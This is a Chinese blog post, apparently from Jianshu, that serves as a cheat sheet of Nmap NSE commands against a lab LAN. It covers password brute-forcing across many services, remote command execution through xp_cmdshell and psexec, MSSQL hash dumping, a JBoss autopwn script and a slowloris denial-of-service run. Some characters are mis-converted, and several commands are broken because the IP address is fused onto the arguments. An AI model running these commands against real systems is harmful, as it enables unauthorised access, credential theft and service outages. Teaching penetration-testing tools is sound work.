Nmap的使用測試入侵靶機(jī)

-sC: 等價(jià)于--script=default,使用默認(rèn)類別的腳本進(jìn)行掃描 可更換其他類別 --script=

scripts>: 使用某個(gè)或某類腳本進(jìn)行掃描,支持通配符描述

--script-args=: 為腳本提供默認(rèn)參數(shù)

--script-args-file=filename: 使用文件來為腳本提供參數(shù) --script-trace:

顯示腳本執(zhí)行過程中發(fā)送與接收的數(shù)據(jù) --script-updatedb: 更新腳本數(shù)據(jù)庫

--script-help=:

顯示腳本的幫助信息,其中部分可以逗號分隔的文件或腳本類別


nmap腳本主要分為以下幾類,在掃描時(shí)可根據(jù)需要設(shè)置--script=類別這種方式進(jìn)行比較籠統(tǒng)的掃描:

auth: 負(fù)責(zé)處理鑒權(quán)證書(繞開鑒權(quán))的腳本

broadcast: 在局域網(wǎng)內(nèi)探查更多服務(wù)開啟狀況,如dhcp/dns/sqlserver等服務(wù)

brute: 提供暴力破解方式,針對常見的應(yīng)用如http/snmp等

default: 使用-sC或-A選項(xiàng)掃描時(shí)候默認(rèn)的腳本,提供基本腳本掃描能力

discovery: 對網(wǎng)絡(luò)進(jìn)行更多的信息,如SMB枚舉、SNMP查詢等

dos: 用于進(jìn)行拒絕服務(wù)攻擊

exploit: 利用已知的漏洞入侵系統(tǒng)

external: 利用第三方的數(shù)據(jù)庫或資源,例如進(jìn)行whois解析

fuzzer: 模糊測試的腳本,發(fā)送異常的包到目標(biāo)機(jī),探測出潛在漏洞 intrusive: 入侵性的腳本,此類腳本可能引發(fā)對方的IDS/IPS的記錄或屏蔽

malware: 探測目標(biāo)機(jī)是否感染了病毒、開啟了后門等信息

safe: 此類與intrusive相反,屬于安全性腳本

version: 負(fù)責(zé)增強(qiáng)服務(wù)與版本掃描(Version Detection)功能的腳本

vuln: 負(fù)責(zé)檢查目標(biāo)機(jī)是否有常見的漏洞(Vulnerability),如是否有MS08_067

(1)nmap --script=auth 192.168.137.*

負(fù)責(zé)處理鑒權(quán)證書(繞開鑒權(quán))的腳本,也可以作為檢測部分應(yīng)用弱口令


(2)nmap --script=brute 192.168.137.*

提供暴力破解的方式 ?可對數(shù)據(jù)庫,smb,snmp等進(jìn)行簡單密碼的暴力猜解


(3)nmap --script=default 192.168.137.*或者nmap -sC 192.168.137.*

默認(rèn)的腳本掃描,主要是搜集各種應(yīng)用服務(wù)的信息,收集到后,可再針對具體服務(wù)進(jìn)行攻擊


(4)nmap --script=vuln 192.168.137.*

檢查是否存在常見漏洞


(5)nmap -n -p445 --script=broadcast 192.168.137.4

在局域網(wǎng)內(nèi)探查更多服務(wù)開啟狀況


(6)nmap --script external 202.103.243.110

利用第三方的數(shù)據(jù)庫或資源,例如進(jìn)行whois解析



0×02 nmap按應(yīng)用服務(wù)掃描

檢查vnc bypass

1? nmap ?--script=realvnc-auth-bypass 192.168.137.4


檢查vnc認(rèn)證方式

2? nmap ?--script=vnc-auth ?192.168.137.4


獲取vnc信息

3? nmap ?--script=vnc-info ?192.168.137.4



(2)smb掃描:

smb破解

? nmap? --script=smb-brute.nse 192.168.137.4


smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.4

smb已知幾個(gè)嚴(yán)重漏


nmap ?--script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

查看共享目錄


nmap -p 445 ?--script smb-ls--script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4

查詢主機(jī)一些敏感信息(注:需要下載nmap_service)


nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test192.168.137.4


查看會話


nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test192.168.137.4

系統(tǒng)信息


nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test192.168.137.4

Mssql掃描:

猜解mssql用戶名和密碼


nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.4

xp_cmdshell 執(zhí)行命令


nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user"192.168.137.4

dumphash值


nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa ?192.168.137.4


掃描root空口令


nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

列出所有mysql用戶


nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

支持同一應(yīng)用的所有腳本掃描


nmap --script=mysql-* 192.168.137.4


(5)Oracle掃描:

oracle sid掃描


nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5

oracle弱口令破解


nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd192.168.137.5

(6)其他一些比較好用的腳本


nmap --script=broadcast-netbios-master-browser 192.168.137.4? 發(fā)現(xiàn)網(wǎng)關(guān)

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 ?破解rsync

nmap --script informix-brute -p 9088 192.168.137.4 ? ?informix數(shù)據(jù)庫破解

nmap -p 5432 --script pgsql-brute 192.168.137.4 ? ? ? pgsql破解

nmap -sU --script snmp-brute 192.168.137.4 ? ? ? ? ? ?snmp破解

nmap -sV --script=telnet-brute 192.168.137.4 ? ? ? ? ?telnet破解

nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' ?jboss autopwn

nmap --script=http-methods.nse 192.168.137.4 檢查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4 ?dos攻擊,對于處理能力較小的站點(diǎn)還挺好用的 'half-HTTP' connections

nmap --script=samba-vuln-cve-2012-1182 ?-p 139 192.168.137.4


nmap Help?

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Nmap掃描原理與用法 1Nmap介紹 Nmap掃描原理與用法PDF:下載地址 Nmap是一款開源免費(fèi)的網(wǎng)絡(luò)發(fā)現(xiàn)(...
    y0ungta1a閱讀 5,535評論 0 50
  • nmap使用指南(終極版) 原創(chuàng)2017-09-09hl0rey信安之路 一、目標(biāo)指定 1.CIDR標(biāo)志位 192...
    用電熱毯烤豬閱讀 12,154評論 1 49
  • 一.基礎(chǔ)概念 不能單純的以端口辨別服務(wù)。很多網(wǎng)絡(luò)服務(wù)是漏洞頻發(fā)的高危對象,對網(wǎng)絡(luò)上的特定服務(wù)進(jìn)行掃描,往往能讓我們...
    linx255閱讀 2,085評論 0 0
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡介 在每...
    三月行者閱讀 1,627評論 0 17
  • 前兩天找?guī)熃懔奶?,從聊天中看出她還沒插本考試失利的低谷中走出來,她回復(fù)我得都是一些否定詞:沒有、不知道、還不確...
    慢就是快的追夢女孩閱讀 860評論 0 0

友情鏈接更多精彩內(nèi)容